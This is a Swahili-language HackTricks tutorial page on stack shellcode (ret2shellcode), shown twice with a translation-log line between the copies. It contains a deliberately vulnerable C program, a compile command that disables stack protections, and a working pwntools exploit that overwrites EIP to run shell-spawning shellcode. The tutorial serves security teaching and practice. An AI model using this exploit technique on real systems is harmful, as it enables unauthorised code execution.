hacktricks/binary-exploitation/stack-overflow/stack-shellcode.md

# Msimbo wa Stack Shellcode

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

## Taarifa Msingi

**Msimbo wa stack shellcode** ni mbinu inayotumiwa katika kudukua binary ambapo muhusika anaandika msimbo wa shell kwenye stack ya programu yenye kasoro na kisha kurekebisha **Pointer ya Maelekezo (IP)** au **Pointer iliyozidishwa ya Maelekezo (EIP)** ili ielekee kwenye eneo la msimbo huu wa shell, ikisababisha utekelezaji wake. Hii ni njia ya kawaida inayotumiwa kupata ufikiaji usioruhusiwa au kutekeleza amri za kupendelea kwenye mfumo lengwa. Hapa kuna maelezo ya mchakato, pamoja na mfano rahisi wa C na jinsi unaweza kuandika shambulio linalofanana kutumia Python na **pwntools**.

### Mfano wa C: Programu yenye Kasoro

Tuanze na mfano rahisi wa programu ya C yenye kasoro:
```c
#include <stdio.h>
#include <string.h>

void vulnerable_function() {
char buffer[64];
gets(buffer); // Unsafe function that does not check for buffer overflow
}

int main() {
vulnerable_function();
printf("Returned safely\n");
return 0;
}
```
Programu hii ina mapungufu ya kujaa kwa sababu ya matumizi ya kazi ya `gets()`.

### Uundaji

Ili kuunda programu hii huku ukizima ulinzi mbalimbali (kwa lengo la kusimuliza mazingira yanayoweza kudhuriwa), unaweza kutumia amri ifuatayo:
```sh
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
```
* `-fno-stack-protector`: Inazuia ulinzi wa stack.
* `-z execstack`: Inafanya stack iweze kutekelezwa, ambayo ni muhimu kwa kutekeleza shellcode iliyohifadhiwa kwenye stack.
* `-no-pie`: Inazuia Position Independent Executable, ikifanya iwe rahisi kutabiri anwani ya kumbukumbu ambapo shellcode yetu itakuwepo.
* `-m32`: Inakusanya programu kama utekelezaji wa biti 32, mara nyingi hutumiwa kwa urahisi katika maendeleo ya kutumia mwanya.

### Shambulizi la Python kwa kutumia Pwntools

Hapa ndivyo unavyoweza kuandika shambulizi kwa kutumia Python ukitumia **pwntools** kutekeleza shambulizi la **ret2shellcode**.
```python
from pwn import *

# Set up the process and context
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path
context.arch = 'i386' # Specify the architecture

# Generate the shellcode
shellcode = asm(shellcraft.sh()) # Using pwntools to generate shellcode for opening a shell

# Find the offset to EIP
offset = cyclic_find(0x6161616c) # Assuming 0x6161616c is the value found in EIP after a crash

# Prepare the payload
# The NOP slide helps to ensure that the execution flow hits the shellcode.
nop_slide = asm('nop') * (offset - len(shellcode))
payload = nop_slide + shellcode
payload += b'A' * (offset - len(payload))  # Adjust the payload size to exactly fill the buffer and overwrite EIP
payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide

# Send the payload
p.sendline(payload)
p.interactive()
```
Hati hii inajenga mzigo unaounda **slaidi ya NOP**, **shellcode**, na kisha kubadilisha **EIP** na anwani inayoashiria kwenye slaidi ya NOP, ikihakikisha shellcode inatekelezwa.

**Slaidi ya NOP** (`asm('nop')`) hutumiwa kuongeza nafasi kwamba utekelezaji uta "kusukuma" kuingia kwenye shellcode yetu bila kujali anwani sahihi. Badilisha hoja ya `p32()` kwa anwani ya kuanzia ya buffer yako pamoja na kufanya marekebisho ili kutua kwenye slaidi ya NOP.

## Kinga

* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **inapaswa kuzimwa** ili anwani iweze kutegemewa kote kwenye utekelezaji au anwani ambapo kazi itahifadhiwa haitakuwa daima sawa na utahitaji kuvuja fulani ili kugundua wapi kazi ya ushindi imehifadhiwa.
* [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) pia inapaswa kuzimwa au anwani iliyoharibiwa ya kurudi kwa EIP haitafuatwa kamwe.
* [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) kinga ya **stack** itazuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitakuwa la kutekelezeka.

## Mifano na Marejeo Mengine

* [https://ir0nstone.gitbook.io/notes/types/stack/shellcode](https://ir0nstone.gitbook.io/notes/types/stack/shellcode)
* [https://guyinatuxedo.github.io/06-bof\_shellcode/csaw17\_pilot/index.html](https://guyinatuxedo.github.io/06-bof\_shellcode/csaw17\_pilot/index.html)
* 64bit, ASLR na kuvuja kwa anwani ya stack, andika shellcode na ruka kwenda kwake
* [https://guyinatuxedo.github.io/06-bof\_shellcode/tamu19\_pwn3/index.html](https://guyinatuxedo.github.io/06-bof\_shellcode/tamu19\_pwn3/index.html)
* 32 bit, ASLR na kuvuja kwa anwani ya stack, andika shellcode na ruka kwenda kwake
* [https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html)
* 32 bit, ASLR na kuvuja kwa anwani ya stack, kulinganisha kuzuia wito wa exit(), badilisha variable na thamani na andika shellcode na ruka kwenda kwake
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00			`# Msimbo wa Stack Shellcode`

			`<details>`

			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`

			`Njia nyingine za kusaidia HackTricks:`

			`* Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`

			`</details>`

			`## Taarifa Msingi`

			Msimbo wa stack shellcode ni mbinu inayotumiwa katika kudukua binary ambapo muhusika anaandika msimbo wa shell kwenye stack ya programu yenye kasoro na kisha kurekebisha Pointer ya Maelekezo (IP) au Pointer iliyozidishwa ya Maelekezo (EIP) ili ielekee kwenye eneo la msimbo huu wa shell, ikisababisha utekelezaji wake. Hii ni njia ya kawaida inayotumiwa kupata ufikiaji usioruhusiwa au kutekeleza amri za kupendelea kwenye mfumo lengwa. Hapa kuna maelezo ya mchakato, pamoja na mfano rahisi wa C na jinsi unaweza kuandika shambulio linalofanana kutumia Python na pwntools.

			`### Mfano wa C: Programu yenye Kasoro`

			`Tuanze na mfano rahisi wa programu ya C yenye kasoro:`
			```c
			`#include <stdio.h>`
			`#include <string.h>`

			`void vulnerable_function() {`
			`char buffer[64];`
			`gets(buffer); // Unsafe function that does not check for buffer overflow`
			`}`

			`int main() {`
			`vulnerable_function();`
			`printf("Returned safely\n");`
			`return 0;`
			`}`
			```
			Programu hii ina mapungufu ya kujaa kwa sababu ya matumizi ya kazi ya `gets()`.

			`### Uundaji`

			`Ili kuunda programu hii huku ukizima ulinzi mbalimbali (kwa lengo la kusimuliza mazingira yanayoweza kudhuriwa), unaweza kutumia amri ifuatayo:`
			```sh
			`gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c`
			```
			* `-fno-stack-protector`: Inazuia ulinzi wa stack.
			* `-z execstack`: Inafanya stack iweze kutekelezwa, ambayo ni muhimu kwa kutekeleza shellcode iliyohifadhiwa kwenye stack.
			* `-no-pie`: Inazuia Position Independent Executable, ikifanya iwe rahisi kutabiri anwani ya kumbukumbu ambapo shellcode yetu itakuwepo.
			* `-m32`: Inakusanya programu kama utekelezaji wa biti 32, mara nyingi hutumiwa kwa urahisi katika maendeleo ya kutumia mwanya.

			`### Shambulizi la Python kwa kutumia Pwntools`

			`Hapa ndivyo unavyoweza kuandika shambulizi kwa kutumia Python ukitumia pwntools kutekeleza shambulizi la ret2shellcode.`
			```python
			`from pwn import *`

			`# Set up the process and context`
			`binary_path = './vulnerable'`
			`p = process(binary_path)`
			`context.binary = binary_path`
			`context.arch = 'i386' # Specify the architecture`

			`# Generate the shellcode`
			`shellcode = asm(shellcraft.sh()) # Using pwntools to generate shellcode for opening a shell`

			`# Find the offset to EIP`
			`offset = cyclic_find(0x6161616c) # Assuming 0x6161616c is the value found in EIP after a crash`

			`# Prepare the payload`
			`# The NOP slide helps to ensure that the execution flow hits the shellcode.`
			`nop_slide = asm('nop') * (offset - len(shellcode))`
			`payload = nop_slide + shellcode`
			`payload += b'A' * (offset - len(payload)) # Adjust the payload size to exactly fill the buffer and overwrite EIP`
			`payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide`

			`# Send the payload`
			`p.sendline(payload)`
			`p.interactive()`
			```
			`Hati hii inajenga mzigo unaounda slaidi ya NOP, shellcode, na kisha kubadilisha EIP na anwani inayoashiria kwenye slaidi ya NOP, ikihakikisha shellcode inatekelezwa.`

			Slaidi ya NOP (`asm('nop')`) hutumiwa kuongeza nafasi kwamba utekelezaji uta "kusukuma" kuingia kwenye shellcode yetu bila kujali anwani sahihi. Badilisha hoja ya `p32()` kwa anwani ya kuanzia ya buffer yako pamoja na kufanya marekebisho ili kutua kwenye slaidi ya NOP.

			`## Kinga`

			`* [ASLR](../common-binary-protections-and-bypasses/aslr/) inapaswa kuzimwa ili anwani iweze kutegemewa kote kwenye utekelezaji au anwani ambapo kazi itahifadhiwa haitakuwa daima sawa na utahitaji kuvuja fulani ili kugundua wapi kazi ya ushindi imehifadhiwa.`
			`* [Stack Canaries](../common-binary-protections-and-bypasses/stack-canaries/) pia inapaswa kuzimwa au anwani iliyoharibiwa ya kurudi kwa EIP haitafuatwa kamwe.`
			`* [NX](../common-binary-protections-and-bypasses/no-exec-nx.md) kinga ya stack itazuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitakuwa la kutekelezeka.`

			`## Mifano na Marejeo Mengine`

			`* [https://ir0nstone.gitbook.io/notes/types/stack/shellcode](https://ir0nstone.gitbook.io/notes/types/stack/shellcode)`
			`* [https://guyinatuxedo.github.io/06-bof\_shellcode/csaw17\_pilot/index.html](https://guyinatuxedo.github.io/06-bof\_shellcode/csaw17\_pilot/index.html)`
			`* 64bit, ASLR na kuvuja kwa anwani ya stack, andika shellcode na ruka kwenda kwake`
			`* [https://guyinatuxedo.github.io/06-bof\_shellcode/tamu19\_pwn3/index.html](https://guyinatuxedo.github.io/06-bof\_shellcode/tamu19\_pwn3/index.html)`
			`* 32 bit, ASLR na kuvuja kwa anwani ya stack, andika shellcode na ruka kwenda kwake`
			`* [https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html)`
			`* 32 bit, ASLR na kuvuja kwa anwani ya stack, kulinganisha kuzuia wito wa exit(), badilisha variable na thamani na andika shellcode na ruka kwenda kwake`